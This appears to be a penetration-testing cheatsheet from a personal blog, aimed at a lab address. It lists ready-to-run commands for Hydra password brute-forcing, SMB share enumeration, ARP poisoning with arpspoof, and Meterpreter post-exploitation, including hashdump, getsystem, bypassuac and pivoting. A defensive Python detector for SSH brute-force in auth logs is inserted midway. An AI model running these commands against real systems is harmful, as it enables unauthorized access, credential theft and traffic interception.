Kaiser784's Blog

Network Attacks

SSH, Telnet, RDP, HTTP auth, Windows shares

Hydra

SSH

hydra -L users.txt -P pass.txt -t 10 10.10.10.10 ssh

Telnet

hydra -L users.txt -P pass.txt telnet://10.10.10.10

FTP

hydra -L users.txt -P pass.txt ftp://10.10.10.10

POST form login

hydra 10.10.10.10 http-post-form "/login.php:user=^USER^&pass=^PASS^:statement for incorrect login" -L /usr/share/ncrack/minimal.usr -P /etc/john/rockyou.txt

Add -f to stop the brute-force as soon as one valid credential is found.

  • /etc/john/rockyou.txt for passwords.

  • /usr/share/ncrack/minimal.usr for users.

  • Sometimes you can just use the users list for the passwords too.
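From the defender's side, the SSH run above leaves a burst of sshd "Failed password" entries from a single source in /var/log/auth.log. The following is an added example, not part of the original cheatsheet, that parses constructed log lines and flags any source with a threshold of failures inside a time window, noting whether a successful login followed the burst; the log format, the year, and the threshold values are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of sshd entries in auth.log syslog format (not real data).
SAMPLE_AUTH_LOG = """\
Mar 10 09:14:01 host sshd[2201]: Failed password for invalid user admin from 10.10.10.99 port 51234 ssh2
Mar 10 09:14:02 host sshd[2203]: Failed password for root from 10.10.10.99 port 51236 ssh2
Mar 10 09:14:02 host sshd[2205]: Failed password for invalid user test from 10.10.10.99 port 51238 ssh2
Mar 10 09:14:03 host sshd[2207]: Failed password for root from 10.10.10.99 port 51240 ssh2
Mar 10 09:14:03 host sshd[2209]: Failed password for invalid user guest from 10.10.10.99 port 51242 ssh2
Mar 10 09:14:04 host sshd[2211]: Accepted password for root from 10.10.10.99 port 51244 ssh2
Mar 10 09:20:30 host sshd[2300]: Failed password for alice from 192.168.1.20 port 40001 ssh2
Mar 10 09:21:10 host sshd[2302]: Accepted password for alice from 192.168.1.20 port 40002 ssh2
"""

# Matches both "Failed password for invalid user X" and "Failed/Accepted password for X".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d+\.\d+\.\d+\.\d+) port \d+"
)

def parse_events(text, year=2024):
    """Yield (timestamp, result, user, src_ip) for each sshd auth line.
    Syslog lines carry no year, so one is assumed."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["src"]

def detect_bruteforce(text, threshold=5, window_s=60):
    """Return {src_ip: details} for sources with >= threshold failures inside
    window_s seconds. success_after lists users that logged in after the burst,
    which is the case worth escalating (a guessed password that worked)."""
    failures, successes = defaultdict(list), defaultdict(list)
    for ts, result, user, src in parse_events(text):
        (failures if result == "Failed" else successes)[src].append((ts, user))
    alerts = {}
    for src, fails in failures.items():
        fails.sort()
        for i in range(len(fails) - threshold + 1):
            first, last = fails[i][0], fails[i + threshold - 1][0]
            if (last - first).total_seconds() <= window_s:
                alerts[src] = {
                    "failures": len(fails),
                    "users": sorted({u for _, u in fails}),
                    "success_after": [u for t, u in successes[src] if t >= last],
                }
                break
    return alerts
```

Spraying many usernames from one source (the -L users.txt pattern) shows up as a long "users" list in the alert; a single user with many failures is the other shape to watch for.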

Shares

Shares Enumeration

nmblookup -A 10.10.10.10

List Shares

smbclient -L //10.10.10.10 -N

Mount Share

smbclient //10.10.10.10/sharename -N

enum4linux

enum4linux -a 10.10.10.10

The above command covers everything the previous ones do and returns more data as well, except mounting shares, which you still have to do with smbclient.

ARP Poisoning

arpspoof

<interface> is your own network interface, e.g. eth0 or tap0.

arpspoof -i <interface> -t target -r host

Metasploit

Basic

search <term>
use <term>
info
show options
set <option> x
exploit

Meterpreter

bind_tcp: runs a server process on the target machine that waits for connections from the attacker machine.

reverse_tcp: the payload on the target connects back to the attacker machine; this often gets past firewall rules that block inbound but allow outbound connections.

background #backgrounds the current session
sessions -l
sessions -i <n> #interact with session n
sysinfo
ifconfig, route
getuid
getsystem #windows privesc
bypassuac #if windows privesc fails
hashdump
cat '/path/to/file.txt'
download '/path/to/fileontarget.txt' /root/mymachine/

Routing in Metasploit

Background the meterpreter session from which the other subnet is reachable.

use post/multi/manage/autoroute
route add <subnet> <session-id>

You have to input the session id of the meterpreter session.

Now the subnet is accessible in the whole of Metasploit-Framework.


Last updated 3 years ago